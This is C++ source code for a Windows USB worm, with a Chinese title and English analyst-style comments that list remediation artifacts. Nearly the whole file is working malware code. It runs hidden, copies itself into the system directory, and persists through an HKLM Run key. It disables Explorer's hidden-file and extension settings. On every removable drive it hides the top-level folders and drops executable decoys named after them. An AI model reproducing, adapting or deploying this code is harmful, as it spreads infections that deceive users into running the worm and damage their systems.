
一种U盘病毒源码

#include "stdafx.h"
#include <windows.h>
#include "resource.h"               
/////////////////////////////////////////////////////
// Forward declaration; the definition follows immediately.
VOID DoBad(char DriveBuf[]);
// Payload applied to one drive root (DriveBuf is "X:\", see OnDeviceChange()).
// What the code does, for analysts: for every top-level directory on the drive
// that is not already hidden/system, the directory is marked HIDDEN|SYSTEM and a
// copy of this executable is written beside it as "<DirectoryName>.exe". With
// the Explorer settings changed in FuckReg() (hidden files stay hidden,
// HideFileExt=1) the copy would be listed under the folder's own name.
// Despite the original comment below there is no recursion: only the drive root
// is walked. Remediation artifacts on the medium: newly hidden/system folders
// plus a same-named ".exe" next to each of them.
VOID DoBad(char DriveBuf[]) 
{
        CFileFind finder;
        // build a string with wildcards: "<DriveBuf>*.*"
        CString strWildcard(DriveBuf);
        strWildcard += _T("*.*");
        char FileSource[MAX_PATH]={0}; 
        char FileNew[MAX_PATH]={0};
        // FileSource = full path of this process's own executable (the drop source).
        HMODULE hModule=GetModuleHandle(NULL); 
        GetModuleFileName(hModule,FileSource,MAX_PATH); 
        // NOTE(review): an HMODULE is not a kernel-object handle, so this
        // CloseHandle is not expected to release anything; it is a quirk of the sample.
        CloseHandle(hModule);  
        // start working for files
        BOOL bWorking = finder.FindFile(strWildcard); 
        while (bWorking)
        {
                bWorking = finder.FindNextFile();
                if (finder.IsDots()) 
                        continue;
                // Only directories that are not yet hidden/system are touched; the
                // loop never descends into them (no recursion, root level only).
                if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
                {       
                        // Hide the real folder; a folder whose attributes cannot be
                        // changed is skipped entirely.
                        if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))  //| FILE_ATTRIBUTE_SYSTEM
                                continue; 
            // FileNew = "<folder path>.exe". sprintf is unbounded here, so a
            // folder path longer than MAX_PATH-4 overruns FileNew (a crash).
            sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
                        // bFailIfExists=TRUE: an already present decoy is left untouched.
                        CopyFile(FileSource,FileNew,TRUE); 
                }
        }
        finder.Close();
}
/////////////////////////////////////////////////////
#include <dbt.h>
// Scratch buffer for one drive root, "X:\" (3 chars + NUL). Filled by
// OnDeviceChange() and passed to DoBad(); shared global, not thread-safe.
char diskPath[5] = { 0 };
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
// Handler for WM_DEVICECHANGE, called from WndProc(). On DBT_DEVICEARRIVAL it
// walks the logical-drive bitmask, takes the first removable drive that has a
// readable volume, writes its root ("X:\") into the global diskPath and hands it
// to DoBad(); because of the break, at most one drive is processed per arrival
// event. On DBT_DEVICEREMOVECOMPLETE it shows a message box whose text
// translates to "USB drive stopped" with the title "Virus notice!" -- a visible
// tell for a user or analyst. hwnd is unused; lParam is cast but never read.
// Always returns 0.
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
//        char U[4];
        PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;   // unused
        DWORD allDisk = GetLogicalDrives();   // one bit per existing drive slot
        if (allDisk!=0)
        {
        switch(wParam)
        {
        case DBT_DEVICEARRIVAL:
                {
                // Bit i of the mask is mapped to the letter 'C'+i. The loop runs
                // 40 times, but once the mask has been shifted to zero the
                // remaining iterations do nothing.
                for (int i=0;i<40;i++)
                {
                        if ((allDisk & 1)==1)
                        {
                                // diskPath = "X:\" -- 4 bytes with NUL, fits the 5-byte global.
                                sprintf(diskPath, "%c", 'C'+i ); 
                                strcat(diskPath, ":\\" );
                               
                                // Only removable drives with a mounted volume are targeted.
                                if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
                                {
                                        if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
                                        {
                                                //MessageBox( NULL,diskPath, "1",MB_OK );
                                                DoBad(diskPath);
                                                break;   // first matching drive only
                                        }
                                }
                        }
                        allDisk = allDisk>>1;
                }
                }
        break;
        case DBT_DEVICEREMOVECOMPLETE:
                // Message text "USB drive stopped", title "Virus notice!" (runtime strings kept as-is).
                MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
        break;
        }
        }
        return LRESULT();
}

LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
// Window procedure of the hidden "WebDown" window created in CreateMyWindow().
// WM_DEVICECHANGE is forwarded to OnDeviceChange(); WM_CLOSE and WM_DESTROY
// return FALSE without PostQuitMessage, so the message loop in CreateMyWindow()
// never ends through normal window closure -- the process stays resident until
// it is terminated externally. All other messages go to DefWindowProc.
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
        switch(message)
        {
        case WM_CREATE:
                break;
        case WM_DEVICECHANGE:
//                if(modify_data.IsUpan)
                        OnDeviceChange(hWnd,wParam,lParam);
                break;
        case WM_CLOSE:
                return FALSE;    // no PostQuitMessage: the window cannot be closed normally
        case WM_DESTROY:
                return FALSE;
        default:
                return DefWindowProc(hWnd,message,wParam,lParam);
        }
        return 0;
}

int CreateMyWindow();
// Registers the window class "WebDown", creates a hidden top-level window
// titled "hacker" (both are observable with window-enumeration tools) and then
// blocks in a GetMessage() loop so the process can receive WM_DEVICECHANGE.
// The initial SendMessage(WM_DEVICECHANGE, 0, 0) carries wParam 0, which
// matches neither case in OnDeviceChange(), so it has no effect. The loop only
// ends on WM_QUIT, which nothing in this file posts; return 1 is in practice
// not reached.
int CreateMyWindow()
{
        MSG msg;
        WNDCLASS wndc;
        LPSTR szAppName="WebDown";   // window class name (detection artifact)
        wndc.style=0;
        wndc.lpfnWndProc=WndProc;  
        wndc.cbClsExtra=0;
        wndc.cbWndExtra=0;
        wndc.hInstance=NULL;
        wndc.hIcon=NULL;
        wndc.hCursor=NULL;
        wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
        wndc.lpszMenuName=NULL;
        wndc.lpszClassName=szAppName;
        RegisterClass(&wndc);
        // Window title "hacker"; immediately hidden, never shown to the user.
        HWND hWnd=CreateWindow(szAppName,"hacker",
                WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
                CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
        ShowWindow(hWnd,SW_HIDE);
        UpdateWindow(hWnd); 
       
        // wParam 0 is not DBT_DEVICEARRIVAL/DBT_DEVICEREMOVECOMPLETE: no-op.
        SendMessage(hWnd,WM_DEVICECHANGE,0,0);
       
        // Blocking message pump; keeps the process alive to catch drive arrivals.
        while(GetMessage(&msg,NULL,0,0))
        {
                TranslateMessage(&msg);
                DispatchMessage(&msg);
        }
        return 1;
}

/////////////////////////////////////////////////////
void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
// Recursively deletes lpSubKey (relative to hKey) together with all of its
// subkeys. Used by FuckReg() to remove Explorer's Folder\Hidden\NOHIDDEN and
// SHOWALL keys. Observations: if RegOpenKeyEx fails the function does not
// return (the return is commented out) and continues with an uninitialized
// hSubKey; RegEnumKeyEx is always queried at index 0 and cbName is not reset
// between iterations. All return values are discarded.
void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey) 
{
        LONG lResult;
        HKEY hSubKey;
        DWORD   dwIndex, cbName;
        char   szSubKey[512];
        FILETIME   ft;
        // KEY_ALL_ACCESS on an HKLM path: only succeeds for an account that may write there.
        lResult   =   RegOpenKeyEx(hKey,   lpSubKey,   0,   KEY_ALL_ACCESS,&hSubKey);
        if (lResult != ERROR_SUCCESS)
        {
                // hSubKey is not valid here; execution falls through regardless.
                RegCloseKey(hSubKey);
                //                return lResult;
        }
        dwIndex = 0;
        cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
        // Each child is deleted in turn; the loop stops at the first enumeration error.
        while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
        {
                DeleteSubKeyTree(hSubKey, szSubKey);
        }
        RegCloseKey(hSubKey);
        lResult = RegDeleteKey(hKey, lpSubKey);
        //        return lResult;
}


void FuckReg();
// Tampers with Explorer's hidden-file settings so the folders hidden by DoBad()
// stay invisible and the dropped "<Folder>.exe" files are listed without their
// extension. Registry artifacts to look for and restore during remediation:
//  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden
//    value "Text" set to a Chinese string (roughly "the machine is infected,
//    test program -- JACK");
//  - the NOHIDDEN and SHOWALL subkeys under that key are deleted (these appear
//    to back the "show hidden files and folders" choices in Folder Options);
//  - HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced value
//    "HideFileExt" (REG_DWORD) set to 1.
// The HKLM writes only succeed for an account that can open those keys for write.
void FuckReg() 
{
        HKEY hKey; 
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey); 
    TCHAR *valueA=_T("机器已经中毒了  本程序测试使用—JACK");
        // Byte count is lstrlen+1 TCHARs; matches REG_SZ only for an ANSI build.
        RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
        RegCloseKey(hKey); 
       
        // Remove the "do not show hidden files" option tree.
        LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
        HKEY hKey1 = HKEY_LOCAL_MACHINE;
        DeleteSubKeyTree(hKey1, lpSubKey1);
       
        // Remove the "show all files" option tree.
        LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
        HKEY hKey2 = HKEY_LOCAL_MACHINE;
        DeleteSubKeyTree(hKey2, lpSubKey2);
       
        // Per-user setting: hide known file extensions (HideFileExt = 1).
        HKEY hKey3; 
        RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3); 
        DWORD valueA3=1;
        RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
        RegCloseKey(hKey3);  // close the handle
}
/////////////////////////////////////////////////////

#include   <shellapi.h>
// Linker settings embedded in the source: /subsystem:windows together with the
// CRT entry point mainCRTStartup lets the program keep a main() while running
// with no console window, so nothing is visible to the user. /ALIGN:4096 sets
// the section alignment of the produced image.
#pragma comment(linker, "/ALIGN:4096")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
// Entry point (no console; see the linker pragmas above). Sequence:
//  1. Decoy: derive a folder path from this executable's own path and open it
//     with ShellExecute("explore"), so launching a dropped "<Folder>.exe" looks
//     like opening that folder.
//  2. Single-instance guard via the named mutex "ALALMN JACK 只做测试使用!!"
//     ("for testing only!!") -- a stable, detectable artifact.
//  3. Copies itself to "<system directory>\hacker.exe" and writes the HKLM Run
//     value "hacker--JACK" pointing at that copy (persistence).
//  4. FuckReg() tampers with Explorer settings, then CreateMyWindow() blocks in
//     a message loop waiting for removable-drive arrivals.
// Remediation artifacts: the dropped file from step 3, the Run value, the mutex
// name, the hidden "WebDown"/"hacker" window, and the registry keys listed on
// FuckReg().
int main()
{
//////////////////////////////////////
char fullPath[MAX_PATH]; 
HMODULE hModule=GetModuleHandle(NULL);  
GetModuleFileName(hModule, fullPath,MAX_PATH);
CString strPath=(CString)fullPath;
// '.exe' is a multi-character constant, so ReverseFind receives a single char
// whose value is compiler-dependent; the cut point below depends on that.
int ret=strPath.ReverseFind(_T('.exe'));  
CString path=strPath.Left(ret-3)+_T("\\"); 
//    MessageBox(path);   
    // Opens an Explorer window on the derived path (the decoy behaviour).
    ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
//        ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);

// Named mutex: a second instance exits immediately.
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
if(GetLastError()==ERROR_ALREADY_EXISTS)
{       
        CloseHandle(m_hMutex);
        m_hMutex=NULL;
        ExitProcess(0);
}
///////////////////////////       
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule1=GetModuleHandle(NULL);
GetModuleFileName(hModule1,FileSource,MAX_PATH);
// NOTE(review): CloseHandle on an HMODULE is not a valid kernel-handle close (same quirk as in DoBad()).
CloseHandle(hModule1);
// FileNew = "<system directory>\hacker.exe" -- the dropped-file artifact.
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,"\\hacker.exe");
///////////////////////////       
// bFailIfExists=TRUE: an existing copy is not overwritten.
CopyFile(FileSource,FileNew,TRUE);
// Persistence: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "hacker--JACK".
HKEY hkey=HKEY_LOCAL_MACHINE;  
char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
HKEY phkResult;
int len=sizeof(FileNew); 
if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS) 
{
        ::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL); 
}       
// This queries the HKLM root handle for a *value* named after the Run subkey
// path, not the Run value itself, so it is not expected to succeed and the
// Run value is written on every start.
if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)  
        ::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1)); 
::RegCloseKey(phkResult); 
///////////////////////////       
FuckReg(); 
CreateMyWindow();   // blocks in the message loop; does not return in practice
//-------------------------
//while (1)   // an infinite loop so the main thread would not exit (disabled; the message loop in CreateMyWindow() blocks instead)
//{
//        Sleep(1000);
//}
//---------------------
return 0;
}
